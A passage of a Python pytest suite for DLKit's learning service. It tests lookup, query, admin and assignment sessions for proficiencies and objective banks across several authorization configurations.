with pytest.raises(errors.Unimplemented):
self.session.get_proficiencies_for_objective_and_resource_on_date(True, True, True, True)
@pytest.mark.skip('unimplemented test')
def test_get_proficiencies_by_genus_type_for_objective_and_resource(self):
"""Tests get_proficiencies_by_genus_type_for_objective_and_resource"""
pass
def test_get_proficiencies_by_genus_type_for_objective_and_resource_on_date(self):
"""Tests get_proficiencies_by_genus_type_for_objective_and_resource_on_date"""
if is_never_authz(self.service_config):
pass # no object to call the method on?
elif uses_cataloging(self.service_config):
pass # cannot call the _get_record() methods on catalogs
else:
with pytest.raises(errors.Unimplemented):
self.session.get_proficiencies_by_genus_type_for_objective_and_resource_on_date(True, True, True, True, True)
def test_get_proficiencies(self):
"""Tests get_proficiencies"""
# From test_templates/resource.py ResourceLookupSession.get_resources_template
from dlkit.abstract_osid.learning.objects import ProficiencyList
if self.svc_mgr.supports_proficiency_query():
objects = self.catalog.get_proficiencies()
assert isinstance(objects, ProficiencyList)
self.catalog.use_federated_objective_bank_view()
objects = self.catalog.get_proficiencies()
assert isinstance(objects, ProficiencyList)
if not is_never_authz(self.service_config):
assert objects.available() > 0
else:
assert objects.available() == 0
else:
if not is_never_authz(self.service_config):
objects = self.catalog.get_proficiencies()
assert isinstance(objects, ProficiencyList)
self.catalog.use_federated_objective_bank_view()
objects = self.catalog.get_proficiencies()
assert objects.available() > 0
assert isinstance(objects, ProficiencyList)
else:
with pytest.raises(errors.PermissionDenied):
self.catalog.get_proficiencies()
def test_get_proficiency_with_alias(self):
if not is_never_authz(self.service_config):
# Because you can't create the alias with NEVER_AUTHZ
self.catalog.alias_proficiency(self.proficiency_ids[0], ALIAS_ID)
obj = self.catalog.get_proficiency(ALIAS_ID)
assert obj.get_id() == self.proficiency_ids[0]
@pytest.fixture(scope="class",
params=['TEST_SERVICE', 'TEST_SERVICE_ALWAYS_AUTHZ', 'TEST_SERVICE_NEVER_AUTHZ', 'TEST_SERVICE_CATALOGING', 'TEST_SERVICE_FILESYSTEM', 'TEST_SERVICE_MEMCACHE'])
def proficiency_query_session_class_fixture(request):
request.cls.service_config = request.param
request.cls.svc_mgr = Runtime().get_service_manager(
'LEARNING',
proxy=PROXY,
implementation=request.cls.service_config)
@pytest.fixture(scope="function")
def proficiency_query_session_test_fixture(request):
request.cls.proficiency_list = list()
request.cls.proficiency_ids = list()
if not is_never_authz(request.cls.service_config):
create_form = request.cls.svc_mgr.get_objective_bank_form_for_create([])
create_form.display_name = 'Test ObjectiveBank'
create_form.description = 'Test ObjectiveBank for ProficiencyQuerySession tests'
request.cls.catalog = request.cls.svc_mgr.create_objective_bank(create_form)
form = request.cls.catalog.get_objective_form_for_create([])
form.display_name = "Test LO"
objective = request.cls.catalog.create_objective(form)
for color in ['Orange', 'Blue', 'Green', 'orange']:
create_form = request.cls.catalog.get_proficiency_form_for_create(objective.ident, AGENT_ID, [])
create_form.display_name = 'Test Proficiency ' + color
create_form.description = (
'Test Proficiency for ProficiencyQuerySession tests, did I mention green')
obj = request.cls.catalog.create_proficiency(create_form)
request.cls.proficiency_list.append(obj)
request.cls.proficiency_ids.append(obj.ident)
else:
request.cls.catalog = request.cls.svc_mgr.get_proficiency_query_session(proxy=PROXY)
request.cls.session = request.cls.catalog
def test_tear_down():
if not is_never_authz(request.cls.service_config):
for catalog in request.cls.svc_mgr.get_objective_banks():
for obj in catalog.get_proficiencies():
catalog.delete_proficiency(obj.ident)
for obj in catalog.get_objectives():
catalog.delete_objective(obj.ident)
request.cls.svc_mgr.delete_objective_bank(catalog.ident)
request.addfinalizer(test_tear_down)
@pytest.mark.usefixtures("proficiency_query_session_class_fixture", "proficiency_query_session_test_fixture")
class TestProficiencyQuerySession(object):
"""Tests for ProficiencyQuerySession"""
def test_get_objective_bank_id(self):
"""Tests get_objective_bank_id"""
# From test_templates/resource.py ResourceLookupSession.get_bin_id_template
if not is_never_authz(self.service_config):
assert self.catalog.get_objective_bank_id() == self.catalog.ident
def test_get_objective_bank(self):
"""Tests get_objective_bank"""
# is this test really needed?
# From test_templates/resource.py::ResourceLookupSession::get_bin_template
if not is_never_authz(self.service_config):
assert isinstance(self.catalog.get_objective_bank(), ABCObjectiveBank)
def test_can_search_proficiencies(self):
"""Tests can_search_proficiencies"""
# From test_templates/resource.py ResourceQuerySession::can_search_resources_template
assert isinstance(self.session.can_search_proficiencies(), bool)
def test_use_federated_objective_bank_view(self):
"""Tests use_federated_objective_bank_view"""
# From test_templates/resource.py ResourceLookupSession.use_federated_bin_view_template
self.catalog.use_federated_objective_bank_view()
def test_use_isolated_objective_bank_view(self):
"""Tests use_isolated_objective_bank_view"""
# From test_templates/resource.py ResourceLookupSession.use_isolated_bin_view_template
self.catalog.use_isolated_objective_bank_view()
def test_get_proficiency_query(self):
"""Tests get_proficiency_query"""
# From test_templates/resource.py ResourceQuerySession::get_resource_query_template
query = self.session.get_proficiency_query()
assert isinstance(query, ABCQueries.ProficiencyQuery)
def test_get_proficiencies_by_query(self):
"""Tests get_proficiencies_by_query"""
# From test_templates/resource.py ResourceQuerySession::get_resources_by_query_template
# Need to add some tests with string types
if not is_never_authz(self.service_config):
query = self.session.get_proficiency_query()
query.match_display_name('orange')
assert self.catalog.get_proficiencies_by_query(query).available() == 2
query.clear_display_name_terms()
query.match_display_name('blue', match=False)
assert self.session.get_proficiencies_by_query(query).available() == 3
else:
with pytest.raises(errors.PermissionDenied):
self.session.get_proficiencies_by_query(FakeQuery())
@pytest.fixture(scope="class",
params=['TEST_SERVICE', 'TEST_SERVICE_ALWAYS_AUTHZ', 'TEST_SERVICE_NEVER_AUTHZ', 'TEST_SERVICE_CATALOGING', 'TEST_SERVICE_FILESYSTEM', 'TEST_SERVICE_MEMCACHE'])
def proficiency_admin_session_class_fixture(request):
request.cls.service_config = request.param
request.cls.proficiency_list = list()
request.cls.proficiency_ids = list()
request.cls.svc_mgr = Runtime().get_service_manager(
'LEARNING',
proxy=PROXY,
implementation=request.cls.service_config)
request.cls.fake_id = Id('objective.objective%3Afake%40DLKIT.MIT.EDU')
if not is_never_authz(request.cls.service_config):
create_form = request.cls.svc_mgr.get_objective_bank_form_for_create([])
create_form.display_name = 'Test ObjectiveBank'
create_form.description = 'Test ObjectiveBank for ProficiencyAdminSession tests'
request.cls.catalog = request.cls.svc_mgr.create_objective_bank(create_form)
form = request.cls.catalog.get_objective_form_for_create([])
form.display_name = "Test LO"
request.cls.objective = request.cls.catalog.create_objective(form)
for color in ['Orange', 'Blue', 'Green', 'orange']:
create_form = request.cls.catalog.get_proficiency_form_for_create(request.cls.objective.ident, AGENT_ID, [])
create_form.display_name = 'Test Proficiency ' + color
create_form.description = (
'Test Proficiency for ProficiencyLookupSession tests, did I mention green')
obj = request.cls.catalog.create_proficiency(create_form)
request.cls.proficiency_list.append(obj)
request.cls.proficiency_ids.append(obj.ident)
request.cls.form = request.cls.catalog.get_proficiency_form_for_create(request.cls.objective.ident, AGENT_ID, [])
request.cls.form.display_name = 'new Proficiency'
request.cls.form.description = 'description of Proficiency'
request.cls.form.genus_type = NEW_TYPE
request.cls.osid_object = request.cls.catalog.create_proficiency(request.cls.form)
else:
request.cls.catalog = request.cls.svc_mgr.get_proficiency_admin_session(proxy=PROXY)
def class_tear_down():
if not is_never_authz(request.cls.service_config):
for catalog in request.cls.svc_mgr.get_objective_banks():
for obj in catalog.get_proficiencies():
catalog.delete_proficiency(obj.ident)
for obj in catalog.get_objectives():
catalog.delete_objective(obj.ident)
request.cls.svc_mgr.delete_objective_bank(catalog.ident)
request.addfinalizer(class_tear_down)
@pytest.fixture(scope="function")
def proficiency_admin_session_test_fixture(request):
request.cls.session = request.cls.catalog
@pytest.mark.usefixtures("proficiency_admin_session_class_fixture", "proficiency_admin_session_test_fixture")
class TestProficiencyAdminSession(object):
"""Tests for ProficiencyAdminSession"""
def test_get_objective_bank_id(self):
"""Tests get_objective_bank_id"""
# From test_templates/resource.py ResourceLookupSession.get_bin_id_template
if not is_never_authz(self.service_config):
assert self.catalog.get_objective_bank_id() == self.catalog.ident
def test_get_objective_bank(self):
"""Tests get_objective_bank"""
# is this test really needed?
# From test_templates/resource.py::ResourceLookupSession::get_bin_template
if not is_never_authz(self.service_config):
assert isinstance(self.catalog.get_objective_bank(), ABCObjectiveBank)
def test_can_create_proficiencies(self):
"""Tests can_create_proficiencies"""
# From test_templates/resource.py::ResourceAdminSession::can_create_resources_template
assert isinstance(self.catalog.can_create_proficiencies(), bool)
def test_can_create_proficiency_with_record_types(self):
"""Tests can_create_proficiency_with_record_types"""
# From test_templates/resource.py::ResourceAdminSession::can_create_resource_with_record_types_template
assert isinstance(self.catalog.can_create_proficiency_with_record_types(DEFAULT_TYPE), bool)
def test_get_proficiency_form_for_create(self):
"""Tests get_proficiency_form_for_create"""
if not is_never_authz(self.service_config):
form = self.catalog.get_proficiency_form_for_create(self.objective.ident, AGENT_ID, [])
assert isinstance(form, OsidForm)
assert not form.is_for_update()
else:
with pytest.raises(errors.PermissionDenied):
self.catalog.get_proficiency_form_for_create(self.fake_id, AGENT_ID, [])
def test_create_proficiency(self):
"""Tests create_proficiency"""
# From test_templates/resource.py::ResourceAdminSession::create_resource_template
from dlkit.abstract_osid.learning.objects import Proficiency
if not is_never_authz(self.service_config):
assert isinstance(self.osid_object, Proficiency)
assert self.osid_object.display_name.text == 'new Proficiency'
assert self.osid_object.description.text == 'description of Proficiency'
assert self.osid_object.genus_type == NEW_TYPE
with pytest.raises(errors.IllegalState):
self.catalog.create_proficiency(self.form)
with pytest.raises(errors.InvalidArgument):
self.catalog.create_proficiency('I Will Break You!')
update_form = self.catalog.get_proficiency_form_for_update(self.osid_object.ident)
with pytest.raises(errors.InvalidArgument):
self.catalog.create_proficiency(update_form)
else:
with pytest.raises(errors.PermissionDenied):
self.catalog.create_proficiency('foo')
def test_can_update_proficiencies(self):
"""Tests can_update_proficiencies"""
# From test_templates/resource.py::ResourceAdminSession::can_update_resources_template
assert isinstance(self.catalog.can_update_proficiencies(), bool)
def test_get_proficiency_form_for_update(self):
"""Tests get_proficiency_form_for_update"""
# From test_templates/resource.py::ResourceAdminSession::get_resource_form_for_update_template
if not is_never_authz(self.service_config):
form = self.catalog.get_proficiency_form_for_update(self.osid_object.ident)
assert isinstance(form, OsidForm)
assert form.is_for_update()
with pytest.raises(errors.InvalidArgument):
self.catalog.get_proficiency_form_for_update(['This is Doomed!'])
with pytest.raises(errors.InvalidArgument):
self.catalog.get_proficiency_form_for_update(
Id(authority='Respect my Authoritay!',
namespace='learning.{object_name}',
identifier='1'))
else:
with pytest.raises(errors.PermissionDenied):
self.catalog.get_proficiency_form_for_update(self.fake_id)
def test_update_proficiency(self):
"""Tests update_proficiency"""
# From test_templates/resource.py::ResourceAdminSession::update_resource_template
if not is_never_authz(self.service_config):
from dlkit.abstract_osid.learning.objects import Proficiency
form = self.catalog.get_proficiency_form_for_update(self.osid_object.ident)
form.display_name = 'new name'
form.description = 'new description'
form.set_genus_type(NEW_TYPE_2)
updated_object = self.catalog.update_proficiency(form)
assert isinstance(updated_object, Proficiency)
assert updated_object.ident == self.osid_object.ident
assert updated_object.display_name.text == 'new name'
assert updated_object.description.text == 'new description'
assert updated_object.genus_type == NEW_TYPE_2
with pytest.raises(errors.IllegalState):
self.catalog.update_proficiency(form)
with pytest.raises(errors.InvalidArgument):
self.catalog.update_proficiency('I Will Break You!')
with pytest.raises(errors.InvalidArgument):
self.catalog.update_proficiency(self.form)
else:
with pytest.raises(errors.PermissionDenied):
self.catalog.update_proficiency('foo')
def test_can_delete_proficiencies(self):
"""Tests can_delete_proficiencies"""
# From test_templates/resource.py::ResourceAdminSession::can_delete_resources_template
assert isinstance(self.catalog.can_delete_proficiencies(), bool)
def test_delete_proficiency(self):
"""Tests delete_proficiency"""
if not is_never_authz(self.service_config):
create_form = self.catalog.get_proficiency_form_for_create(self.objective.ident, AGENT_ID, [])
create_form.display_name = 'new Proficiency'
create_form.description = 'description of Proficiency'
create_form.genus_type = NEW_TYPE
osid_object = self.catalog.create_proficiency(create_form)
self.catalog.delete_proficiency(osid_object.ident)
with pytest.raises(errors.NotFound):
self.catalog.get_proficiency(osid_object.ident)
else:
with pytest.raises(errors.PermissionDenied):
self.catalog.delete_proficiency(self.fake_id)
def test_delete_proficiencies(self):
"""Tests delete_proficiencies"""
if is_never_authz(self.service_config):
pass # no object to call the method on?
else:
with pytest.raises(errors.Unimplemented):
self.session.delete_proficiencies()
def test_can_manage_proficiency_aliases(self):
"""Tests can_manage_proficiency_aliases"""
# From test_templates/resource.py::ResourceAdminSession::can_manage_resource_aliases_template
assert isinstance(self.catalog.can_manage_proficiency_aliases(), bool)
def test_alias_proficiency(self):
"""Tests alias_proficiency"""
# From test_templates/resource.py::ResourceAdminSession::alias_resource_template
if not is_never_authz(self.service_config):
alias_id = Id(self.catalog.ident.namespace + '%3Amy-alias%40ODL.MIT.EDU')
self.catalog.alias_proficiency(self.osid_object.ident, alias_id)
aliased_object = self.catalog.get_proficiency(alias_id)
assert aliased_object.ident == self.osid_object.ident
else:
with pytest.raises(errors.PermissionDenied):
self.catalog.alias_proficiency(self.fake_id, self.fake_id)
@pytest.fixture(scope="class",
params=['TEST_SERVICE', 'TEST_SERVICE_ALWAYS_AUTHZ', 'TEST_SERVICE_NEVER_AUTHZ', 'TEST_SERVICE_CATALOGING', 'TEST_SERVICE_FILESYSTEM', 'TEST_SERVICE_MEMCACHE'])
def proficiency_objective_bank_assignment_session_class_fixture(request):
request.cls.service_config = request.param
request.cls.proficiency_list = list()
request.cls.proficiency_ids = list()
request.cls.svc_mgr = Runtime().get_service_manager(
'LEARNING',
proxy=PROXY,
implementation=request.cls.service_config)
request.cls.fake_id = Id('resource.Resource%3Afake%40DLKIT.MIT.EDU')
if not is_never_authz(request.cls.service_config):
create_form = request.cls.svc_mgr.get_objective_bank_form_for_create([])
create_form.display_name = 'Test ObjectiveBank'
create_form.description = 'Test ObjectiveBank for ProficiencyObjectiveBankAssignmentSession tests'
request.cls.catalog = request.cls.svc_mgr.create_objective_bank(create_form)
create_form = request.cls.svc_mgr.get_objective_bank_form_for_create([])
create_form.display_name = 'Test ObjectiveBank for Assignment'
create_form.description = 'Test ObjectiveBank for ProficiencyObjectiveBankAssignmentSession tests assignment'
request.cls.assigned_catalog = request.cls.svc_mgr.create_objective_bank(create_form)
create_form = request.cls.catalog.get_objective_form_for_create([])
create_form.display_name = 'Test Objective for Assignment'
create_form.description = 'Test Objective for ProficiencyObjectiveBankAssignmentSession tests assignment'
request.cls.objective = request.cls.catalog.create_objective(create_form)
for num in [0, 1, 2]:
create_form = request.cls.catalog.get_proficiency_form_for_create(request.cls.objective.ident, AGENT_ID, [])
create_form.display_name = 'Test Proficiency ' + str(num)
create_form.description = 'Test Proficiency for ProficiencyObjectiveBankAssignmentSession tests'
obj = request.cls.catalog.create_proficiency(create_form)
request.cls.proficiency_list.append(obj)
request.cls.proficiency_ids.append(obj.ident)
def class_tear_down():
if not is_never_authz(request.cls.service_config):
for obj in request.cls.catalog.get_proficiencies():
request.cls.catalog.delete_proficiency(obj.ident)
request.cls.catalog.delete_objective(request.cls.objective.ident)
request.cls.svc_mgr.delete_objective_bank(request.cls.assigned_catalog.ident)
request.cls.svc_mgr.delete_objective_bank(request.cls.catalog.ident)
request.addfinalizer(class_tear_down)
@pytest.fixture(scope="function")
def proficiency_objective_bank_assignment_session_test_fixture(request):
# From test_templates/resource.py::ResourceBinAssignmentSession::init_template
request.cls.session = request.cls.svc_mgr
@pytest.mark.usefixtures("proficiency_objective_bank_assignment_session_class_fixture", "proficiency_objective_bank_assignment_session_test_fixture")
class TestProficiencyObjectiveBankAssignmentSession(object):
"""Tests for ProficiencyObjectiveBankAssignmentSession"""
def test_can_assign_proficiencies(self):
"""Tests can_assign_proficiencies"""
# From test_templates/resource.py::ResourceBinAssignmentSession::can_assign_resources_template
result = self.session.can_assign_proficiencies()
assert isinstance(result, bool)
def test_can_assign_proficiencies_to_objective_bank(self):
"""Tests can_assign_proficiencies_to_objective_bank"""
# From test_templates/resource.py::ResourceBinAssignmentSession::can_assign_resources_to_bin_template
result = self.session.can_assign_proficiencies_to_objective_bank(self.assigned_catalog.ident)
assert isinstance(result, bool)
def test_get_assignable_objective_bank_ids(self):
"""Tests get_assignable_objective_bank_ids"""
# From test_templates/resource.py::ResourceBinAssignmentSession::get_assignable_bin_ids_template
# Note that our implementation just returns all catalogIds, which does not follow
# the OSID spec (should return only the catalogIds below the given one in the hierarchy.
if not is_never_authz(self.service_config):
results = self.session.get_assignable_objective_bank_ids(self.catalog.ident)
assert isinstance(results, IdList)
# Because we're not deleting all banks from all tests, we might
# have some crufty banks here...but there should be at least 2.
assert results.available() >= 2
else:
with pytest.raises(errors.PermissionDenied):
self.session.get_assignable_objective_bank_ids(self.fake_id)
def test_get_assignable_objective_bank_ids_for_proficiency(self):
"""Tests get_assignable_objective_bank_ids_for_proficiency"""
# From test_templates/resource.py::ResourceBinAssignmentSession::get_assignable_bin_ids_for_resource_template
# Note that our implementation just returns all catalogIds, which does not follow
# the OSID spec (should return only the catalogIds below the given one in the hierarchy.
if not is_never_authz(self.service_config):
results = self.session.get_assignable_objective_bank_ids_for_proficiency(self.catalog.ident, self.proficiency_ids[0])
assert isinstance(results, IdList)
# Because we're not deleting all banks from all tests, we might
# have some crufty banks here...but there should be at least 2.
assert results.available() >= 2
else:
with pytest.raises(errors.PermissionDenied):
self.session.get_assignable_objective_bank_ids_for_proficiency(self.fake_id, self.fake_id)
def test_assign_proficiency_to_objective_bank(self):
"""Tests assign_proficiency_to_objective_bank"""
# From test_templates/resource.py::ResourceBinAssignmentSession::assign_resource_to_bin_template
if not is_never_authz(self.service_config):
results = self.assigned_catalog.get_proficiencies()
assert results.available() == 0
self.session.assign_proficiency_to_objective_bank(self.proficiency_ids[1], self.assigned_catalog.ident)
results = self.assigned_catalog.get_proficiencies()
assert results.available() == 1
self.session.unassign_proficiency_from_objective_bank(
self.proficiency_ids[1],
self.assigned_catalog.ident)
else:
with pytest.raises(errors.PermissionDenied):
self.session.assign_proficiency_to_objective_bank(self.fake_id, self.fake_id)
def test_unassign_proficiency_from_objective_bank(self):
"""Tests unassign_proficiency_from_objective_bank"""
# From test_templates/resource.py::ResourceBinAssignmentSession::unassign_resource_from_bin_template
if not is_never_authz(self.service_config):
results = self.assigned_catalog.get_proficiencies()
assert results.available() == 0
self.session.assign_proficiency_to_objective_bank(
self.proficiency_ids[1],
self.assigned_catalog.ident)
results = self.assigned_catalog.get_proficiencies()
assert results.available() == 1
self.session.unassign_proficiency_from_objective_bank(
self.proficiency_ids[1],
self.assigned_catalog.ident)
results = self.assigned_catalog.get_proficiencies()
assert results.available() == 0
else:
with pytest.raises(errors.PermissionDenied):
self.session.unassign_proficiency_from_objective_bank(self.fake_id, self.fake_id)
def test_reassign_proficiency_to_objective_bank(self):
"""Tests reassign_proficiency_to_objective_bank"""
if is_never_authz(self.service_config):
pass # no object to call the method on?
elif uses_cataloging(self.service_config):
pass # cannot call the _get_record() methods on catalogs
else:
with pytest.raises(errors.Unimplemented):
self.session.reassign_proficiency_to_objective_bank(True, True, True)
@pytest.fixture(scope="class",
params=['TEST_SERVICE', 'TEST_SERVICE_ALWAYS_AUTHZ', 'TEST_SERVICE_NEVER_AUTHZ', 'TEST_SERVICE_CATALOGING', 'TEST_SERVICE_FILESYSTEM', 'TEST_SERVICE_MEMCACHE'])
def objective_bank_lookup_session_class_fixture(request):
# From test_templates/resource.py::BinLookupSession::init_template
request.cls.service_config = request.param
request.cls.catalogs = list()
request.cls.catalog_ids = list()
request.cls.svc_mgr = Runtime().get_service_manager(
'LEARNING',
proxy=PROXY,
implementation=request.cls.service_config)
request.cls.fake_id = Id('resource.Resource%3Afake%40DLKIT.MIT.EDU')
if not is_never_authz(request.cls.service_config):
for num in [0, 1]:
create_form = request.cls.svc_mgr.get_objective_bank_form_for_create([])
create_form.display_name = 'Test ObjectiveBank ' + str(num)
create_form.description = 'Test ObjectiveBank for learning proxy manager tests'
catalog = request.cls.svc_mgr.create_objective_bank(create_form)
request.cls.catalogs.append(catalog)
request.cls.catalog_ids.append(catalog.ident)
def class_tear_down():
if not is_never_authz(request.cls.service_config):
for catalog in request.cls.svc_mgr.get_objective_banks():
request.cls.svc_mgr.delete_objective_bank(catalog.ident)
request.addfinalizer(class_tear_down)
@pytest.fixture(scope="function")
def objective_bank_lookup_session_test_fixture(request):
# From test_templates/resource.py::BinLookupSession::init_template
request.cls.session = request.cls.svc_mgr
@pytest.mark.usefixtures("objective_bank_lookup_session_class_fixture", "objective_bank_lookup_session_test_fixture")
class TestObjectiveBankLookupSession(object):
"""Tests for ObjectiveBankLookupSession"""
def test_can_lookup_objective_banks(self):
"""Tests can_lookup_objective_banks"""
# From test_templates/resource.py::BinLookupSession::can_lookup_bins_template
assert isinstance(self.session.can_lookup_objective_banks(), bool)
def test_use_comparative_objective_bank_view(self):
"""Tests use_comparative_objective_bank_view"""
# From test_templates/resource.py::BinLookupSession::use_comparative_bin_view_template
self.svc_mgr.use_comparative_objective_bank_view()
def test_use_plenary_objective_bank_view(self):
"""Tests use_plenary_objective_bank_view"""
# From test_templates/resource.py::BinLookupSession::use_plenary_bin_view_template
self.svc_mgr.use_plenary_objective_bank_view()
def test_get_objective_bank(self):
"""Tests get_objective_bank"""
# From test_templates/resource.py::BinLookupSession::get_bin_template
if not is_never_authz(self.service_config):
catalog = self.svc_mgr.get_objective_bank(self.catalogs[0].ident)
assert catalog.ident == self.catalogs[0].ident
else:
with pytest.raises(errors.PermissionDenied):
self.svc_mgr.get_objective_bank(self.fake_id)
def test_get_objective_banks_by_ids(self):
"""Tests get_objective_banks_by_ids"""
# From test_templates/resource.py::BinLookupSession::get_bins_by_ids_template
if not is_never_authz(self.service_config):
catalogs = self.svc_mgr.get_objective_banks_by_ids(self.catalog_ids)
assert catalogs.available() == 2
assert isinstance(catalogs, ABCObjects.ObjectiveBankList)
catalog_id_strs = [str(cat_id) for cat_id in self.catalog_ids]
for index, catalog in enumerate(catalogs):
assert str(catalog.ident) in catalog_id_strs
catalog_id_strs.remove(str(catalog.ident))
else:
with pytest.raises(errors.PermissionDenied):
self.svc_mgr.get_objective_banks_by_ids([self.fake_id])
def test_get_objective_banks_by_genus_type(self):
"""Tests get_objective_banks_by_genus_type"""
# From test_templates/resource.py::BinLookupSession::get_bins_by_genus_type_template
if not is_never_authz(self.service_config):
catalogs = self.svc_mgr.get_objective_banks_by_genus_type(DEFAULT_GENUS_TYPE)
assert catalogs.available() > 0
assert isinstance(catalogs, ABCObjects.ObjectiveBankList)
else:
with pytest.raises(errors.PermissionDenied):
self.svc_mgr.get_objective_banks_by_genus_type(DEFAULT_GENUS_TYPE)
def test_get_objective_banks_by_parent_genus_type(self):
"""Tests get_objective_banks_by_parent_genus_type"""
if is_never_authz(self.service_config):
pass # no object to call the method on?
elif uses_cataloging(self.service_config):
pass # cannot call the _get_record() methods on catalogs
else:
with pytest.raises(errors.Unimplemented):
self.session.get_objective_banks_by_parent_genus_type(True)
def test_get_objective_banks_by_record_type(self):
"""Tests get_objective_banks_by_record_type"""
if is_never_authz(self.service_config):
pass # no object to call the method on?
elif uses_cataloging(self.service_config):
pass # cannot call the _get_record() methods on catalogs
else:
with pytest.raises(errors.Unimplemented):
self.session.get_objective_banks_by_record_type(True)
def test_get_objective_banks_by_provider(self):
"""Tests get_objective_banks_by_provider"""
if is_never_authz(self.service_config):
pass # no object to call the method on?
elif uses_cataloging(self.service_config):
pass # cannot call the _get_record() methods on catalogs
else:
with pytest.raises(errors.Unimplemented):
self.session.get_objective_banks_by_provider(True)
def test_get_objective_banks(self):
"""Tests get_objective_banks"""
# From test_templates/resource.py::BinLookupSession::get_bins_template
if not is_never_authz(self.service_config):
catalogs = self.svc_mgr.get_objective_banks()
assert catalogs.available() > 0
assert isinstance(catalogs, ABCObjects.ObjectiveBankList)
else:
with pytest.raises(errors.PermissionDenied):
self.svc_mgr.get_objective_banks()
@pytest.fixture(scope="class",
params=['TEST_SERVICE', 'TEST_SERVICE_ALWAYS_AUTHZ', 'TEST_SERVICE_NEVER_AUTHZ', 'TEST_SERVICE_CATALOGING', 'TEST_SERVICE_FILESYSTEM', 'TEST_SERVICE_MEMCACHE'])
def objective_bank_admin_session_class_fixture(request):
# From test_templates/resource.py::BinAdminSession::init_template
request.cls.service_config = request.param
request.cls.svc_mgr = Runtime().get_service_manager(
'LEARNING',
proxy=PROXY,
implementation=request.cls.service_config)
request.cls.fake_id = Id('resource.Resource%3Afake%40DLKIT.MIT.EDU')
@pytest.fixture(scope="function")
def objective_bank_admin_session_test_fixture(request):
# From test_templates/resource.py::BinAdminSession::init_template
if not is_never_authz(request.cls.service_config):
# Initialize test catalog:
create_form = request.cls.svc_mgr.get_objective_bank_form_for_create([])
create_form.display_name = 'Test ObjectiveBank'
create_form.description = 'Test ObjectiveBank for ObjectiveBankAdminSession tests'
request.cls.catalog = request.cls.svc_mgr.create_objective_bank(create_form)
# Initialize catalog to be deleted:
create_form = request.cls.svc_mgr.get_objective_bank_form_for_create([])
create_form.display_name = 'Test ObjectiveBank For Deletion'
create_form.description = 'Test ObjectiveBank for ObjectiveBankAdminSession deletion test'
request.cls.catalog_to_delete = request.cls.svc_mgr.create_objective_bank(create_form)
request.cls.session = request.cls.svc_mgr
def test_tear_down():
if not is_never_authz(request.cls.service_config):
for catalog in request.cls.svc_mgr.get_objective_banks():
request.cls.svc_mgr.delete_objective_bank(catalog.ident)
request.addfinalizer(test_tear_down)
@pytest.mark.usefixtures("objective_bank_admin_session_class_fixture", "objective_bank_admin_session_test_fixture")
class TestObjectiveBankAdminSession(object):
"""Tests for ObjectiveBankAdminSession"""
def test_can_create_objective_banks(self):
"""Tests can_create_objective_banks"""
# From test_templates/resource.py BinAdminSession.can_create_bins_template
assert isinstance(self.svc_mgr.can_create_objective_banks(), bool)
def test_can_create_objective_bank_with_record_types(self):
"""Tests can_create_objective_bank_with_record_types"""
# From test_templates/resource.py BinAdminSession.can_create_bin_with_record_types_template
assert isinstance(self.svc_mgr.can_create_objective_bank_with_record_types(DEFAULT_TYPE), bool)
def test_get_objective_bank_form_for_create(self):
"""Tests get_objective_bank_form_for_create"""
# From test_templates/resource.py BinAdminSession.get_bin_form_for_create_template
from dlkit.abstract_osid.learning.objects import ObjectiveBankForm
if not is_never_authz(self.service_config):
catalog_form = self.svc_mgr.get_objective_bank_form_for_create([])
assert isinstance(catalog_form, OsidCatalogForm)
assert not catalog_form.is_for_update()
with pytest.raises(errors.InvalidArgument):
self.svc_mgr.get_objective_bank_form_for_create([1])
else:
with pytest.raises(errors.PermissionDenied):
self.svc_mgr.get_objective_bank_form_for_create([])
def test_create_objective_bank(self):
"""Tests create_objective_bank"""
# From test_templates/resource.py BinAdminSession.create_bin_template
from dlkit.abstract_osid.learning.objects import ObjectiveBank
if not is_never_authz(self.service_config):
catalog_form = self.svc_mgr.get_objective_bank_form_for_create([])
catalog_form.display_name = 'Test ObjectiveBank'
catalog_form.description = 'Test ObjectiveBank for ObjectiveBankAdminSession.create_objective_bank tests'
new_catalog = self.svc_mgr.create_objective_bank(catalog_form)
assert isinstance(new_catalog, OsidCatalog)
with pytest.raises(errors.IllegalState):
self.svc_mgr.create_objective_bank(catalog_form)
with pytest.raises(errors.InvalidArgument):
self.svc_mgr.create_objective_bank('I Will Break You!')
update_form = self.svc_mgr.get_objective_bank_form_for_update(new_catalog.ident)
with pytest.raises(errors.InvalidArgument):
self.svc_mgr.create_objective_bank(update_form)
else:
with pytest.raises(errors.PermissionDenied):
self.svc_mgr.create_objective_bank('foo')
def test_can_update_objective_banks(self):
"""Tests can_update_objective_banks"""
# From test_templates/resource.py BinAdminSession.can_update_bins_template
assert isinstance(self.svc_mgr.can_update_objective_banks(), bool)
def test_get_objective_bank_form_for_update(self):
"""Tests get_objective_bank_form_for_update"""
# From test_templates/resource.py BinAdminSession.get_bin_form_for_update_template
from dlkit.abstract_osid.learning.objects import ObjectiveBankForm
if not is_never_authz(self.service_config):
catalog_form = self.svc_mgr.get_objective_bank_form_for_update(self.catalog.ident)
assert isinstance(catalog_form, OsidCatalogForm)
assert catalog_form.is_for_update()
else:
with pytest.raises(errors.PermissionDenied):
self.svc_mgr.get_objective_bank_form_for_update(self.fake_id)
def test_update_objective_bank(self):
"""Tests update_objective_bank"""
# From test_templates/resource.py BinAdminSession.update_bin_template
if not is_never_authz(self.service_config):
catalog_form = self.svc_mgr.get_objective_bank_form_for_update(self.catalog.ident)
# Update some elements here?
self.svc_mgr.update_objective_bank(catalog_form)
else:
with pytest.raises(errors.PermissionDenied):
self.svc_mgr.update_objective_bank('foo')
def test_can_delete_objective_banks(self):
"""Tests can_delete_objective_banks"""
# From test_templates/resource.py BinAdminSession.can_delete_bins_template
assert isinstance(self.svc_mgr.can_delete_objective_banks(), bool)
def test_delete_objective_bank(self):
"""Tests delete_objective_bank"""
# From test_templates/resource.py BinAdminSession.delete_bin_template
if not is_never_authz(self.service_config):
cat_id = self.catalog_to_delete.ident
self.svc_mgr.delete_objective_bank(cat_id)
with pytest.raises(errors.NotFound):
self.svc_mgr.get_objective_bank(cat_id)
else:
with pytest.raises(errors.PermissionDenied):
self.svc_mgr.delete_objective_bank(self.fake_id)
def test_can_manage_objective_bank_aliases(self):
"""Tests can_manage_objective_bank_aliases"""
# From test_templates/resource.py::ResourceAdminSession::can_manage_resource_aliases_template
assert isinstance(self.svc_mgr.can_manage_objective_bank_aliases(), bool)
def test_alias_objective_bank(self):
"""Tests alias_objective_bank"""
# From test_templates/resource.py BinAdminSession.alias_bin_template
alias_id = Id('learning.ObjectiveBank%3Amy-alias%40ODL.MIT.EDU')
